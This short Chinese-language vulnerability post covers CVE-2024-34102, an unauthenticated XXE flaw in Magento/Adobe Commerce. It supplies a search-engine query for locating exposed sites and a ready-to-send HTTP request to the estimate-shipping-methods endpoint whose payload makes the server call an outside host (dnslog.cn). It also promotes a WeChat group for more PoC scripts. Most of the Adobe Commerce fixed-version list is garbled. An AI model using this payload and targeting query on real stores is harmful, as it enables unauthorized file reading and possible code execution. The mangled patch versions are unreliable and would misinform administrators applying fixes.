0x01 产品简介
Magento最初是一个开源的电子商务平台,后来被Adobe公司收购,并更名为Adobe Commerce,是一个功能丰富、灵活且可扩展的电子商务解决方案。Adobe Commerce提供了强大的定制能力,允许商家根据自己的业务需求进行灵活调整。通过人工智能和机器学习技术,为B2B和B2C客户提供个性化的内容、促销、推荐和网站搜索,提高转化率。能够帮助商家实现业务增长并提供卓越的购物体验。
0x02 漏洞概述
2024年6月,Adobe官方披露CVE-2024-34102 Magento estimate-shipping-methods XXE漏洞,攻击者可在无需登陆的情况下构造恶意请求利用XXE读取文件,或者结合CVE-2024-2961 可能造成远程代码执行。
0x03 搜索引擎
app="Adobe-Magento"
0x04 漏洞复现
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: your-ip
Content-Type: application/json
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://dnslog.cn","dataIsURL":true,"options":12345678}}}}}}
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
请使用VX扫一扫加入内部POC
脚本分享圈子
0x06 修复建议
目前官方已有可更新安全版本,建议受影响用户升级至安全版本:
Adobe Commerce 安全版本:
247-p1,2.46-6,24.5-08,2.44-09,243-ext8,2.42-ext8,2.41-ext8,2.4.0-ext8,2 3.7-p4-ext8
Magento Open Source 安全版本:
2.4.7-p1,2.4.6-p6,2.4.5-p8,2.4.4-p9